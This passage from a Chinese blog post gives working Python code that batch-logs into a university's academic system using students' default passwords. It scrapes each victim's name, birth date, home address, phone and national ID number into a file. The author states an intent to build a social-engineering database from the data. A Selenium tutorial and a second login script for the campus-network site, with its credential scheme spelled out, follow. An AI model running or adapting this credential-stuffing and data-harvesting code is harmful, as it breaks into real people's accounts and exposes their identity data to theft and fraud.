有的浏览器可以显示所有页面，如IE，但是有的浏览器只能显示部分页面，这里使用“xskp/jwxs_xskp_like.aspx?usermain=”判断是否显示完全</span></span><br><span class="line">	<span class="comment"># 二、是否登录成功  如果出现“other/CheckCode.aspx” 就说明没有登陆成功</span></span><br><span class="line"></span><br><span class="line">	<span class="comment"># 是否登录成功，为-1则表示成功，否则则失败</span></span><br><span class="line">	login_success_whether = result.find(<span class="string">'other/CheckCode.aspx'</span>)</span><br><span class="line">	<span class="keyword">if</span> login_success_whether == <span class="number">-1</span>:</span><br><span class="line">		<span class="keyword">print</span> <span class="string">"Login success!!"</span> + account</span><br><span class="line">		info_url_early = opener.open(early_url).read()</span><br><span class="line">		info_url_middle = re.findall(<span class="string">'xskp/jwxs_xskp_like\.aspx\?usermain=x\d&#123;10&#125;'</span>,info_url_early,re.S)[<span class="number">0</span>]</span><br><span class="line">		info_url_after = <span class="string">'http://教务系统/JWXS/'</span> + info_url_middle</span><br><span class="line">		<span class="comment"># 获取到个人信息页面</span></span><br><span class="line">		data_info = opener.open(info_url_after).read()</span><br><span class="line"></span><br><span class="line">		Soup = BeautifulSoup(data_info,<span class="string">'lxml'</span>)</span><br><span class="line">		institute = Soup.select(<span class="string">'#lbxsh'</span>)[<span class="number">0</span>].get_text()</span><br><span class="line">		major = Soup.select(<span class="string">'#lbzyh'</span>)[<span class="number">0</span>].get_text()</span><br><span class="line">		Class = Soup.select(<span class="string">'#lbbh'</span>)[<span class="number">0</span>].get_text()</span><br><span class="line">		name = Soup.select(<span class="string">'#tbxsxm'</span>)[<span class="number">0</span>].get(<span class="string">'value'</span>)</span><br><span class="line">		birth = Soup.select(<span class="string">'#tbcsrq'</span>)[<span class="number">0</span>].get(<span class="string">'value'</span>)</span><br><span class="line">		location = Soup.select(<span class="string">'#tbjtxzdz'</span>)[<span class="number">0</span>].get(<span class="string">'value'</span>)</span><br><span class="line">		home_tel = Soup.select(<span class="string">'#tblxdh'</span>)[<span class="number">0</span>].get(<span class="string">'value'</span>)</span><br><span class="line">		ID = Soup.select(<span class="string">'#tbsfzh'</span>)[<span class="number">0</span>].get(<span class="string">'value'</span>)</span><br><span class="line">		response = <span class="string">u'&#123;&#125; &#123;&#125; &#123;&#125; &#123;&#125; &#123;&#125; &#123;&#125; &#123;&#125; &#123;&#125; &#123;&#125;'</span>.format(account,institute,major,Class,name,birth,location,home_tel,ID)</span><br><span class="line">		detail =  response.encode(<span class="string">'gb18030'</span>)</span><br><span class="line">		<span class="keyword">print</span> detail</span><br><span class="line">		student_info.write(detail + <span class="string">'\n'</span>)</span><br><span class="line">	<span class="keyword">else</span>:</span><br><span class="line">		<span class="keyword">print</span> <span class="string">"Login fail...."</span> + account</span><br><span class="line">		<span class="keyword">pass</span></span><br><span class="line"></span><br><span class="line">a = open(<span class="string">'demo.txt'</span>,<span class="string">'r'</span>)</span><br><span class="line">account = a.readlines()</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> account:</span><br><span class="line">	i = i.strip(<span class="string">'\n'</span>)</span><br><span class="line">	Optain_info(i)</span><br><span class="line"></span><br><span class="line"><span class="comment"># account_info = num.split()</span></span><br><span class="line"><span class="comment"># for i in account_info:</span></span><br><span class="line"><span class="comment"># 	Optain_info(i)</span></span><br></pre></td></tr></table></figure></p>
<p>还应该再完善一下，大一的时候写<a href="http://www.addon.pub/2016/08/17/python%E7%88%AC%E5%8F%96%E6%95%B0%E5%8D%81%E4%B8%87%E7%BA%A7%E6%95%B0%E6%8D%AE/" target="_blank" rel="noopener">爬取十万级数据</a> 时候学习了将数据存储在mongodb中，但是自己本机的数据库文件一般存储的都不怎么好，完了搭个社工库的时候再改善改善吧。</p>
<p>这届大二的比大三的好很多嘛，还是有不少人把自己的默认密码改掉的，也还算有点安全意识。<br><img src="https://0169-1251822086.cos.ap-chengdu.myqcloud.com/Blog_photo/Test/18-4-18/8504381.jpg" alt=""></p>
<h2 id="Selenium初探与环境配置"><a href="#Selenium初探与环境配置" class="headerlink" title="Selenium初探与环境配置"></a>Selenium初探与环境配置</h2><p><strong>学习selenium python需要的工具</strong><br>1、浏览器<br>2、Python<br>3、Selenium<br>4、chromedriver、IEDriverServer、geckodriver<br>5、IDE（Pycharm/Sublime/Eclipse等等）</p>
<p><strong><font color="red">在Windows下安装对应的驱动（heclpdrober/chromedriver/IEDriverServer）</font></strong></p>
<p><strong>这里使用的是Firefox，新版本的Firefox浏览器需要安装geckodriver驱动：</strong><br>Windows 64位：<a href="http://download.csdn.net/download/czq_520/9953528" target="_blank" rel="noopener">http://download.csdn.net/download/czq_520/9953528</a><br>Windows 32位：<a href="http://download.csdn.net/download/czq_520/9953533" target="_blank" rel="noopener">http://download.csdn.net/download/czq_520/9953533</a></p>
<blockquote>
<p>已经下了一份64位的，丢在网盘：<br>链接：<a href="https://pan.baidu.com/s/1HYL8DtMBhsIVzOWdmFo5fQ" target="_blank" rel="noopener">https://pan.baidu.com/s/1HYL8DtMBhsIVzOWdmFo5fQ</a> 密码：lhjc</p>
</blockquote>
<p><strong>使用方法：</strong><br>    1、下载完成解压；<br>    2、将geckodriver放到python文件下<br>    3、将其添加到环境变量（python文件夹已经在环境变量，所以不用管了）</p>
<p><strong>Chrome：</strong><br>如果需要使用Chrome浏览器或者IE浏览器，则需要对应的驱动，chromedriver，chromedriver没有64位版本，32即可驱动：<br>下载地址：<a href="https://npm.taobao.org/mirrors/chromedriver" target="_blank" rel="noopener">https://npm.taobao.org/mirrors/chromedriver</a><br>使用方法同geckodriver。</p>
<p><strong>环境组合：</strong><br>Python3 + Selenium3.11 + Firefox59（旧版本不兼容）</p>
<h3 id="相关基础语法"><a href="#相关基础语法" class="headerlink" title="相关基础语法"></a>相关基础语法</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> selenium <span class="keyword">import</span> webdriver</span><br><span class="line"><span class="comment">#创建一个到浏览器的连接</span></span><br><span class="line">driver = webdriver.Firefox()</span><br><span class="line">driver = webdriver.Chrome()</span><br><span class="line"><span class="comment">#在选定的浏览器中加载网页，调用get方法</span></span><br><span class="line">driver.get(‘http://www.baidu.com’)</span><br><span class="line"><span class="comment">#查看源代码</span></span><br><span class="line">driver.page_source</span><br><span class="line"><span class="comment">#设置要选取的元素，支持id，css selector和xpath</span></span><br><span class="line">driver.find_element_by_id()</span><br><span class="line">driver.find_element_by_css_selector()</span><br><span class="line">driver.find_element_by_xpath()</span><br><span class="line"><span class="comment">#常用的查找元素的方法</span></span><br><span class="line">find_element_by_name</span><br><span class="line">find_element_by_id</span><br><span class="line">find_element_by_xpath</span><br><span class="line">find_element_by_link_text</span><br><span class="line">find_element_by_partial_link_text</span><br><span class="line">find_element_by_tag_name</span><br><span class="line">find_element_by_class_name</span><br><span class="line">find_element_by_css_selector</span><br><span class="line"><span class="comment">#较通用的办法</span></span><br><span class="line"><span class="keyword">from</span> selenium.webdriver.common.by <span class="keyword">import</span> By</span><br><span class="line">xxx.find_element(By.ID,<span class="string">"xxxx"</span>)</span><br><span class="line"><span class="comment">#元素交互操作/模拟按键输入（找到搜索框并输入相关信息）</span></span><br><span class="line">some_info = driver.find_element_by_id(<span class="string">'xxxx'</span>).send_keys(<span class="string">'MACBook'</span>)</span><br><span class="line"><span class="comment">#获取元素属性</span></span><br><span class="line">get_attribute(<span class="string">'xxxxx'</span>)</span><br><span class="line"><span class="comment">#获取文本值</span></span><br><span class="line">text</span><br><span class="line"><span class="comment">#获取ID，位置，标签名</span></span><br><span class="line">xxx.id</span><br><span class="line">xxx.location</span><br><span class="line">xxx.tag_name</span><br><span class="line">xxx.size</span><br><span class="line"><span class="comment">#简单元素操作方式</span></span><br><span class="line">清除元素内容：clear()</span><br><span class="line">模拟按键输入：send_keys()</span><br><span class="line">点击（比如获取按钮后调用此方法进行点击）：click()      </span><br><span class="line">提交表单：submit()</span><br><span class="line"><span class="comment">#切入frame以及切出来</span></span><br><span class="line">xxx.switch_to.frame(<span class="string">'xxxxxx'</span>)</span><br><span class="line">xxx.switch_to.parent_frame()</span><br><span class="line"><span class="comment">#执行JS</span></span><br><span class="line">driver.execute_script(js)</span><br><span class="line"><span class="comment">#等待</span></span><br><span class="line">当查找元素或者元素并没有立即出现的时候，隐式等待将等待一段时间再查找DOM，默认时间为<span class="number">0</span>。</span><br><span class="line">隐式等待</span><br><span class="line">到了一定的时间发现元素还没有加载，则继续等待我们指定的时间，如果超过了我们指定的时间还没有加载就会抛出异常，如果没有需要等待的时候就已经加载完毕就会立即执行。</span><br><span class="line">browser = webdriver.Chrome()</span><br><span class="line">browser.implicitly_wait(<span class="number">10</span>)</span><br><span class="line">显示等待</span><br><span class="line">指定一个等待条件，并且指定一个最长等待时间，会在这个时间内进行判断是否满足等待条件，如果成立就会立即返回，如果不成立，就会一直等待，直到等待你指定的最长等待时间，如果还是不满足，就会抛出异常，如果满足了就会正常返回</span><br><span class="line">browser = webdriver.Chrome()</span><br><span class="line">waite = WebDriverWait(browser，<span class="number">10</span>)</span><br><span class="line">input = wait.unit(判断条件（目标）)</span><br><span class="line">常用的判断条件：</span><br><span class="line">title_is 标题是某内容</span><br><span class="line">title_contains 标题包含某内容</span><br><span class="line">presence_of_element_located 元素加载出，传入定位元组，如(By.ID, <span class="string">'p'</span>)</span><br><span class="line">visibility_of_element_located 元素可见，传入定位元组</span><br><span class="line">visibility_of 可见，传入元素对象</span><br><span class="line">presence_of_all_elements_located 所有元素加载出</span><br><span class="line">text_to_be_present_in_element 某个元素文本包含某文字</span><br><span class="line">text_to_be_present_in_element_value 某个元素值包含某文字</span><br><span class="line">frame_to_be_available_and_switch_to_it frame加载并切换</span><br><span class="line">invisibility_of_element_located 元素不可见</span><br><span class="line">element_to_be_clickable 元素可点击</span><br><span class="line">staleness_of 判断一个元素是否仍在DOM，可判断页面是否已经刷新</span><br><span class="line">element_to_be_selected 元素可选择，传元素对象</span><br><span class="line">element_located_to_be_selected 元素可选择，传入定位元组</span><br><span class="line">element_selection_state_to_be 传入元素对象以及状态，相等返回<span class="keyword">True</span>，否则返回<span class="keyword">False</span></span><br><span class="line">element_located_selection_state_to_be 传入定位元组以及状态，相等返回<span class="keyword">True</span>，否则返回<span class="keyword">False</span></span><br><span class="line">alert_is_present 是否出现Alert</span><br><span class="line"><span class="comment">#浏览器的前进和后退</span></span><br><span class="line">back()</span><br><span class="line">forward()</span><br><span class="line"><span class="comment">#cookie操作</span></span><br><span class="line">get_cookies()</span><br><span class="line">delete_all_cookies()</span><br><span class="line">add_cookie(字典)</span><br><span class="line"><span class="comment">#选项卡管理</span></span><br><span class="line">通过执行js命令打开新的选项卡  window.open()</span><br><span class="line">不同的选项卡存在列表browser.window_handles</span><br><span class="line">通过 switch_to_window来进行选项卡的切换</span><br><span class="line">browser = webdriver.Chrome()</span><br><span class="line">browser.get(<span class="string">'https://www.baidu.com'</span>)</span><br><span class="line">browser.execute_script(<span class="string">'window.open()'</span>)</span><br><span class="line">browser.switch_to_window(browser.window_handles[<span class="number">1</span>])</span><br><span class="line">browser.get(<span class="string">'https://www.taobao.com'</span>)</span><br><span class="line">time.sleep(<span class="number">1</span>)</span><br><span class="line">browser.switch_to_window(browser.window_handles[<span class="number">0</span>])</span><br><span class="line">browser.get(<span class="string">'https://python.org'</span></span><br><span class="line"><span class="comment">#异常处理</span></span><br><span class="line">较为复杂</span><br><span class="line"><span class="keyword">from</span> selenium.common.exceptions <span class="keyword">import</span> TimeoutException，NoSuchElementException</span><br><span class="line">使用<span class="keyword">except</span>来捕获，看是否超时与查找一个不存在的元素</span><br><span class="line"><span class="comment">#关闭浏览器</span></span><br><span class="line">driver.close()</span><br><span class="line">driver.quit()</span><br></pre></td></tr></table></figure>
<h2 id="爬取分析以及代码编写"><a href="#爬取分析以及代码编写" class="headerlink" title="爬取分析以及代码编写"></a>爬取分析以及代码编写</h2><p>校园网充值站登录为学号 + 身份证后六位</p>
<p>教务系统登录为：学号 + 学号</p>
<h2 id="Selenium登录代码"><a href="#Selenium登录代码" class="headerlink" title="Selenium登录代码"></a>Selenium登录代码</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding:utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> selenium <span class="keyword">import</span> webdriver</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">sys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding=<span class="string">'gb18030'</span>)</span><br><span class="line"></span><br><span class="line">index_url = <span class="string">'http://192.168.168.168/nav_login'</span></span><br><span class="line">driver = webdriver.Firefox()</span><br><span class="line">driver.get(index_url)</span><br><span class="line"><span class="comment"># 直接输入帐号密码登录就行了，抓个鸡的验证码</span></span><br><span class="line"><span class="comment"># source = driver.page_source</span></span><br><span class="line"><span class="comment"># code = re.findall('var checkcode="(.*?)";',source,re.S)[0]</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 输入用户名和密码</span></span><br><span class="line">account = driver.find_element_by_css_selector(<span class="string">'#account'</span>).send_keys(<span class="string">'xxxxxxxxxx'</span>)</span><br><span class="line">password = driver.find_element_by_css_selector(<span class="string">'#pass'</span>).send_keys(<span class="string">'xxxxxx'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 按钮点击</span></span><br><span class="line">driver.find_element_by_css_selector(<span class="string">'#loginform &gt; div:nth-child(7) &gt; input'</span>).click()</span><br></pre></td></tr></table></figure>
<p>（代码很简单）登陆是可以登录，但是如果用来批量进行的话用这个不是个明智的选择。</p>
<p>到这其实也就差不多了，帐号有个四五个就够用了，手测一下就行了…</p>
<p>selenium可以停了，但是脚本还是要继续的嘛~~</p>
<p><a href="https://github.com/Yokeen/Spider_school_acount" target="_blank" rel="noopener">https://github.com/Yokeen/Spider_school_acount</a></p>
<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p>这个站自己还得再分析分析，也刚好利用这个站再深入学习学习内网渗透…</p>
<p>就先这样吧。</p>
<p>祝大家学业有成，工作顺利。</p>
<p>最近准备投简历了，也祝我自己顺利。</p>

    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>原文作者：<a href="http://lessismore.cool">Yokeen</a>
            </p><p>原文链接：<a href="http://lessismore.cool/2018/04/14/初探Selenium/">http://lessismore.cool/2018/04/14/初探Selenium/</a>
            </p><p>发表日期：<a href="http://lessismore.cool/2018/04/14/初探Selenium/">April 14th 2018, 11:48:36 am</a>
            </p><p>更新日期：<a href="http://lessismore.cool/2018/04/14/初探Selenium/">November 29th 2018, 9:33:42 pm</a>
            </p><p>版权声明：本文采用<a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href="/2018/04/22/无题/" title="Onenote笔记">
                    <div class="nextTitle">Onenote笔记</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href="/2018/04/10/CTF中的杂项小结/" title="CTF中的杂项小结">
                    <div class="prevTitle">CTF中的杂项小结</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:googleimage@qq.com" class="iconfont-archer email" title="email"></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#场景"><span class="toc-number">1.</span> <span class="toc-text">场景</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#分析与编写"><span class="toc-number">2.</span> <span class="toc-text">分析与编写</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#具体编写流程分析"><span class="toc-number">2.1.</span> <span class="toc-text">具体编写流程分析</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#脚本编写"><span class="toc-number">3.</span> <span class="toc-text">脚本编写</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#获取可用学号"><span class="toc-number">3.1.</span> <span class="toc-text">获取可用学号</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#进行教务系统批量登录并获取其个人信息"><span class="toc-number">3.2.</span> <span class="toc-text">进行教务系统批量登录并获取其个人信息</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Selenium初探与环境配置"><span class="toc-number">3.3.</span> <span class="toc-text">Selenium初探与环境配置</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#相关基础语法"><span class="toc-number">3.3.1.</span> <span class="toc-text">相关基础语法</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#爬取分析以及代码编写"><span class="toc-number">3.4.</span> <span class="toc-text">爬取分析以及代码编写</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Selenium登录代码"><span class="toc-number">3.5.</span> <span class="toc-text">Selenium登录代码</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#后记"><span class="toc-number">4.</span> <span class="toc-text">后记</span></a></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 43
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2021 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/11</span><a class="archive-post-title" href="/2021/08/11/AWD篇/">AWD篇</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/11</span><a class="archive-post-title" href="/2021/08/11/CTF密码学篇/">CTF密码学篇</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/11</span><a class="archive-post-title" href="/2021/08/11/Web渗透篇/">Web渗透篇</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/11</span><a class="archive-post-title" href="/2021/08/11/内网渗透篇/">内网渗透篇</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/10</span><a class="archive-post-title" href="/2021/08/10/毕业两年期/">毕业两年期</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/17</span><a class="archive-post-title" href="/2019/06/17/DNS劫持与内网投毒/">DNS劫持与内网投毒</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/31</span><a class="archive-post-title" href="/2019/05/31/Tor组网搭建过程/">在PC以及路由器上的Tor组网搭建过程</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/25</span><a class="archive-post-title" href="/2019/05/25/毕业论文《基于机器学习的Web异常流量监测系统的设计与实现》/">毕业论文《基于机器学习的Web异常流量监测系统的设计与实现》</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/24</span><a class="archive-post-title" href="/2019/05/24/BadUSB制作与使用/">BadUSB制作与使用</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/24</span><a class="archive-post-title" href="/2019/05/24/Hi-im-back/">Hi,im back.</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2018 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/28</span><a class="archive-post-title" href="/2018/06/28/Django中的基础攻防测试/">Django基础开发与攻防测试[入门篇]</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/12</span><a class="archive-post-title" href="/2018/06/12/Python-Fuzzing脚本编写学习/">Python Fuzzing脚本编写学习</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/27</span><a class="archive-post-title" href="/2018/04/27/nmap脚本编写初探/">nmap脚本编写初探</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/22</span><a class="archive-post-title" href="/2018/04/22/无题/">Onenote笔记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/14</span><a class="archive-post-title" href="/2018/04/14/初探Selenium/">网络账号获取与Selenium初探</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/10</span><a class="archive-post-title" href="/2018/04/10/CTF中的杂项小结/">CTF中的杂项小结</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">02/25</span><a class="archive-post-title" href="/2018/02/25/利用Python爆破教务系统批量获取用户信息/">利用Python爆破教务系统批量获取用户信息</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">02/02</span><a class="archive-post-title" href="/2018/02/02/sqlmap-payload学习/">sqlmap payload学习</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2017 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/28</span><a class="archive-post-title" href="/2017/12/28/学期总结-大三上/">大学三年级上 学习总结</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/18</span><a class="archive-post-title" href="/2017/12/18/Python-Scapy/">Python-Scapy</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/13</span><a class="archive-post-title" href="/2017/11/13/好书推荐/">好书推荐</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/09</span><a class="archive-post-title" href="/2017/11/09/代码审计初探-XDCMS/">代码审计初探与XDCMS审计</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/31</span><a class="archive-post-title" href="/2017/10/31/Wireshark的使用/">Wireshark查看TCP三次握手以及流式图片恢复</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/13</span><a class="archive-post-title" href="/2017/10/13/CTF-sha1和MD5/">CTF中的sha1和MD5碰撞</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/08</span><a class="archive-post-title" href="/2017/10/08/提升期/">提升期</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/24</span><a class="archive-post-title" href="/2017/08/24/解决MySQL为单一用户root设置密码刷新权限后还是可以空密码登录问题/">解决MySQL为单一用户root设置密码刷新权限后还是可以空密码登录问题</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/03</span><a class="archive-post-title" href="/2017/08/03/使用msf路由转发实现内网渗透/">使用msf路由转发实现内网渗透</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/26</span><a class="archive-post-title" href="/2017/05/26/解决python2-x编码之殇/">转-python2编码问题</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/21</span><a class="archive-post-title" href="/2017/05/21/关于sqlmap dump数据的格式问题/">关于sqlmap dump数据的格式问题</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/14</span><a class="archive-post-title" href="/2017/05/14/Linux下反弹shell以及传输文件的几种方法/">Linux下反弹shell及传输文件的几种方法</a>
        </li>
    
    
        <li class="archive-post-item">
